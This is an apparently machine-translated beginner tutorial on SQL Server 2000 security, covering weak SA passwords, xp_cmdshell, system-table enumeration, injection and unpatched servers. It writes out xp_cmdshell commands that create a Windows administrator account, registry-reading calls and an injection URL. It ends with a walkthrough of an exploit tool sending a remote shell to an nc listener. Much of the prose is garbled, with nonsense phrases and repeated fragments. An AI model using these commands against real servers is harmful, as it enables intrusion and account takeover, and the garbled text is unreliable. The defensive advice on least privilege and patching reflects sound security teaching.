The small king of the unit learned SQL Server for a period of time, has made a good management system, and the little king made me help to see if the library is designed, and I found that his security awareness is very weak. Perhaps the problem that beginners is easy to ignore, this article explores some common security issues in SQL Server, is to see the people who are beginning to SQL Server, and they are definitely very hot, don't read. This article is used by SQL Server 2000, which is abbreviated as SQL Server. I. Air password or weak mouth makes beginners to save the SQL Server, SQL Server Administrator SA uses empty passwords or weakvings, which is very dangerous, and these dangers are often unsuccessful, small Wang feels that his library is a test data, nothing to use, even if someone else doesn't matter. As everyone knows that the default user SA of SQL Server is very great. There is a point of view that SA's permissions are greater than the authority of Administrator, that is, unrestricted SA users can do anything that Windows system administrators do. Below we are a simple trial. Add a user USER1 to the Windows system via SQL Server and add the user to the administrator user group administrators. 1. First look at the method of adding the user in the Windows system under normal circumstances. There are two types: one is performed under the graphical interface, and the other is under the command window, and the following demonstrates to increase the user through the command. 1) In the "Start" -> "Run", enter the CMD, enter the command window, as shown in Figure 1: 2), the first line command NET USER USER1 / Add (add a user name is User1 user). 3), the second line NET localGroupAdminisstrators User1 / Add (add this user to Administrators). 4), the third line NET user (see the user of the system, you can see that the USER1 user has been added). 5), the fourth line of NET User User1 / Delete (delete USER1 users), add users to the system through SQL Server by SQL Server. Figure 1 2, increasing system users 1 in SQL Server), open SQL Server's Enterprise Manager -> Tools -> SQL Query Analyzer. As shown in Figure 2, enter the IP address of the SQL Server to be connected, and then appear after the interface appears, pay attention to the Master library. Figure 2), as shown in FIG. 3, entered in the query window: exec XP_cmdshell 'Net User User1 / Add', press execution, if the prompt of the "successful completion" appears, the execution is successful. 3), then, as shown in FIG. 5, input EXEC XP_CMDSHELL 'NET LOCALGROALGROUP Administrators User1 / Add', and the prompts of FIG. 5 appear after successful. Figure 3 Figure 4 NET USER USER1 / Add and NET LOCALGROUP Administrators User1 / Add Administrators User1 / Add Administrators User1 / Add Administrators User1 / Add Administrators User1 / Add They are standard orders under the Windows system we have used above. Figure 6 can see that USER1 has been added to the administrator group. Figure 6 See this! You can do things that Windows system administrators can do through powerful SQL Server.
The experiment that established the user above the SQL Server is the SQL Server I remotely connected to the test machine from this machine, adds the user, Figure 7 is the IPC connection established by the original user User1 and the remote computer, then enter this machine It is easy to make things. The next security knowledge yourself check, there are very many online. Figure 7 3, further explaining the XP_cmdshell of the above is one of the extended stored procedures of SQL Server, and the stored procedure is like a function we programmed, and the content is a series of SQL statements and optionally controlling statements that need to be written. The application is performed by a call and allows the user to declare variables, conditional execution, and other powerful programming functions. Each library can store the stored procedure, but the extended stored procedure exists only in the master database. For the user, the extension stored procedure is the same as the normal stored procedure, and the implementation method is the same. However, the extended stored procedure can perform many of the operations other than the database, and we see the various commands under Windows systems by calling xp_cmdshell. The ability to extend the stored procedure is very powerful, as shown in Figure 8, which exist during the extended stored procedure in the Master library. Such as XP_REGENUMVALUES, XP_REGREAD, XP_REGWRITE, XP_REGDELETEVALUE, XP_REGDELETEKEY These extended stored procedures can read and write the registry. For example: You can view the startup item in the registry by the following command. EXEC XP_REGENUMVALUES 'HKEY_LOCAL_MACHINE', 'Software / Microsoft / Windows / Currentversion / Run'
Second, injection and inter-library attack injection and cross-library attacks may be the most popular words in the 2004 hacker attack. Its principles and above are all permissions of SQL Server Administrator SA, thus controlling the database. The Windows system is controlled by using SQL Server such as XP_cmdshell. Different methods of injection and empty passwords are different, and the injection is that the ASP program has a vulnerability when connecting SQL Server, and the hacker uses a vulnerability to acquire SA permissions. Speaking of this, Xiao Wang is a little doubtful, and the SA in the program is its own library and the expansion stored procedure is in the Master library, how to use it? Simply put, you can check what library built by users after SA, which tables in the library, what are the fields in the table, and the records of the table. How do these achieve? To answer this question, you need to start from two aspects. When you create a new library, what changes do SQL Server play? The second is the permissions of SQL Server. 1. Newly built a library in the system library and system table location example: Newly built a library in SQL Server, the library name is: XYZ, build a TEST table under this library, the field is ID, Name, Password. 1) Where is the library? After SQL Server installation, the 6 libraries were installed by default, where Northwind, Pubs are example libraries, others are system databases, each with it. After the XYZ library is built, the library name exists in the SysDatabases table in the master library. As shown in Figure 9, the value of the DBID field in the sysdatabases table is the user's own library. Figure 10 uses Select Name from sysdatabases where dbid> 6 can detect the library built by the user, just built the XYZ library is also there. Figure 9 Figure 10 2) Where is the table? Table name exists in the XYZ library, the sysobjects table and xtype = 'u', as shown in Figure 11, input SELECT * from sysObjects where xtype = 'u' can detect the table name is Test, remember our original table TEST corresponding to the table TEST Is 357576312 Figure 11 3), what fields? What are the fields in the TEST table? The field of the table exists in the syscolumns table in the XYZ library, and the ID is equal to the ID corresponding to the Test table in the sysobjects table, that is, we have 357576312. As shown in Figure 12, enter the Select * from syscolumns where id = '357576312' can detect fields in the TEST table. Figure 12 4) Summary When a user with the corresponding permissions is connected to the SQL Server, you can get the database name built by querying the SysDatabases table in the Master library, then query the sysobjects table of the user database to find the created table, then Query the syscolumns table of the user database to find the fields in the table, and then check the record. This example refers to a user with corresponding permissions, what permissions have users? We will follow. 2. Understand users, roles, and permissions These concepts should be very clear about these concepts. It takes a lot of space, this article only makes a brief introduction. To access SQL Server must be a user, if you want to access a database, you must give the user access to this database. The role is a collection of permissions. The relationship between users and roles is like the relationship between users and user groups in a Windows system.
Still an example! Why is SA have such a big permission? SA is the default super user of SQL Server. The interface is selected, you can see the role of the SA is System Administrators, and the role is mentioned earlier is a collection of permissions, click on "Properties" in Figure 14, you can see in Figure 15. This role has all permissions to operate SQL Server. As can be seen in Figure 16, the SA has access to all databases, and now I understand why SA has such a big permission. Figure 13 Figure 14 Figure 15 Figure 16 During the actual management system, it is not necessary to have such a large permission, and generally can access the library built. You can create a new user, only give this user limited permissions, such a safety factor should be higher, from this idea to see how it is achieved. 1) New AAA users As shown in Figure 17, the interface appears after the new login, enter the username AAA, enter a strong password. Figure 17 Figure 18 2), set permissions, such as what is not selected in the Server Role option, as shown in Figure 19, only "XYZ" library in the "Database Access" option, that is, let AAA users Access the XYZ library. "Allow" in database roles "only selects the default" public ". Figure 19 Figure 20 3) After the test is set, log in to "SQL Query Analyzer" with aAA user, as shown in Figure 21, execute the exec XP_cmdshell 'Net User User1 / Add', the result of the expected result, no permission execution. Figure 21 then performs SELECT NAME FROM SYSDATABASS WHERE DBID> 6, the expected result is no permission execution, the actual result is exactly the same as the query results of Figure 10, is the AAA user does not have a MASTER library? In addition to unable access to WZ_CXXT_NEW, AAA users can access, other libraries can access, what is the problem?
The problem is in the public role, the following paragraph is written in the SQL Server Help. The public role is a special database role that belongs to it. Public role: • Capture all the default permissions in the database in the database. · Unable to assign users, groups, or roles, because they belong to this role by default. • In each database, including Master, MSDB, Tempdb, Model, and all user databases. · Unable to remove it. As shown in Figure 22, the "public" role in the master library, double-click "PUBLIC", click "Permissions" in the interface, appear interface, you can see the role has the access rights of sysdatabases. It can be seen that the permissions are very fine, SELECT, INSERT, UPDATE, DELETE, etc. ', The SELECT permission of owner' dbo '). "Tips. Figure 22 Figure 24 Figure 24 The PUBLIC role does not perform the permissions of the extended stored procedure by default, but the permissions performed by the role can be given, and the access to the library can also be removed. Seeing this, is it very troublesome, the setting of this privilege is a double-edged sword, setting too loose will have security vulnerabilities, too strictly in the process of running, this article cannot give a thorough solution, As long as you understand the principles, you can figure out a best solution in practice. 3, injecting the injection of SQL Server ASP, there is an ASP connection SQL Server user's permissions large enough, and the ASP program itself has a vulnerability, and thus constructs http: //www.**.com/aaa. ASP? ID = 2300 and 0 <> (Select Count (*) from master.dbo.sysdatabases where name> 1 and dbid = 6) This SQL statement is based on the principles of the forebel, and the corresponding records are exported. There are many wonderful and classic articles on injection, as well as tools like NBSI2, there is not a door to the door. Third, SQL Server does not play the vulnerability of the patch, the SQL Server, which is installed on Win 2000, no patch, SQL Server, no patch, is a big leakage, no matter how rigor of your permissions, it is a one The broken paper is smashed.
The following example is an attack on a vulnerability SQL Serve (mounted on 192.168.113.10 machine), the experiment is used in the experiment, the NC and SQL2, NC alias Swiss army knife, is an old and very powerful network tool. If you want to know the details, please refer to the online related information, SQL2 is SQL Serve specially attacked with vulnerabilities (SP2, including SP2), the process is as follows: Figure 25, command in my machine (IP address 192.168.113.207) Under the window (running CMD), running nc -l -p 77, meaning the new command window in this unit opened 77, runs SQL2 192.168.113.10 192.168.113.207 77 0 If the SQL Serve on 192.168.113.10 has a vulnerability, 192.168.113.207 The NC monitor window will appear on the interface of Figure 26, pay attention! This interface is equipped with SQL Serve machine, in other words, we have invaded this machine. Next, look at Figure 27, the address of IPConfig checks is 192.168.113.10, it is controlled, simple! Figure 25 Figure 26
